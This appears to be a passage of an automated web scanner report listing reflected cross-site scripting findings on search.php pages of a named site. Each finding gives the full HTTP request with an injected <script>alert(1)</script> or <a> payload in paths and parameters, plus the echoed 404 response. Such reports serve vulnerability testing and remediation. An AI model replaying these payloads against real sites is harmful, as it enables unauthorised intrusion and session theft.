HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...14805<a>fbc4f161a0b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4058. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45a95<script>alert(1)</script>54d78fd68f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&45a95<script>alert(1)</script>54d78fd68f4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&45a95<script>alert(1)</script>54d78fd68f4=1 was not found on this server.</p>
...[SNIP]...

2.4059. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 939c7<a>4c01e7c2e94 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The scanner could not confirm a payload that executes arbitrary JavaScript in this parameter; examine it manually for input validation or other filtering that may be blocking the script probe.

Request

GET /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2939c7<a>4c01e7c2e94 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2939c7<a>4c01e7c2e94 was not found on this server.</p>
...[SNIP]...

2.4060. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1b68f<script>alert(1)</script>5bfcb749a59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information1b68f<script>alert(1)</script>5bfcb749a59/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information1b68f<script>alert(1)</script>5bfcb749a59/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4061. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52124<script>alert(1)</script>7e4752a9729 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks52124<script>alert(1)</script>7e4752a9729/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks52124<script>alert(1)</script>7e4752a9729/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4062. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebf68<script>alert(1)</script>92e5d6e7f95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesebf68<script>alert(1)</script>92e5d6e7f95/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesebf68<script>alert(1)</script>92e5d6e7f95/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4063. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65209<script>alert(1)</script>5ab0b1da3e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos65209<script>alert(1)</script>5ab0b1da3e6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos65209<script>alert(1)</script>5ab0b1da3e6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4064. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84f91<script>alert(1)</script>3a0853005b1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/search.php84f91<script>alert(1)</script>3a0853005b1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php84f91<script>alert(1)</script>3a0853005b1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4065. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 948d6<a>98a0d69a9d8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This shows that new HTML tags can be injected into the returned document. The scanner could not confirm a payload that executes arbitrary JavaScript in this parameter; examine it manually for input validation or other filtering that may be blocking the script probe.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search948d6<a>98a0d69a9d8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search948d6<a>98a0d69a9d8&opt=2 was not found on this server.</p>
...[SNIP]...

2.4066. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7605f<a>ebf28abae44 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...7605f<a>ebf28abae44&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...7605f<a>ebf28abae44&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4067. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ff9cd<script>alert(1)</script>3eb9a324c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ff9cd<script>alert(1)</script>3eb9a324c87=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ff9cd<script>alert(1)</script>3eb9a324c87=1 was not found on this server.</p>
...[SNIP]...

2.4068. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 45927<a>38fc69b3506 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=245927<a>38fc69b3506 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=245927<a>38fc69b3506 was not found on this server.</p>
...[SNIP]...

2.4069. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13959<script>alert(1)</script>7ca6668aea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information13959<script>alert(1)</script>7ca6668aea/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information13959<script>alert(1)</script>7ca6668aea/ebooks/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4070. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26864<script>alert(1)</script>84d305f13dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks26864<script>alert(1)</script>84d305f13dd/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks26864<script>alert(1)</script>84d305f13dd/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4071. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4c4d0<script>alert(1)</script>d37ab6bb80c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes4c4d0<script>alert(1)</script>d37ab6bb80c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes4c4d0<script>alert(1)</script>d37ab6bb80c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4072. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3992<script>alert(1)</script>3f8214e3a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/search.phpc3992<script>alert(1)</script>3f8214e3a1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.phpc3992<script>alert(1)</script>3f8214e3a1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4073. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 34415<a>f816c92d2b3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search34415<a>f816c92d2b3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...&Submit3=Search34415<a>f816c92d2b3&opt=2 was not found on this server.</p>
...[SNIP]...

2.4074. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7b14d<a>9547a44aaab was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/themes/search.php?keyword=search...7b14d<a>9547a44aaab&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/search.php?keyword=search...7b14d<a>9547a44aaab&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4075. http://www.resellerbase.com/resources-information/ebooks/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9edf4<script>alert(1)</script>86f6eeee724 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

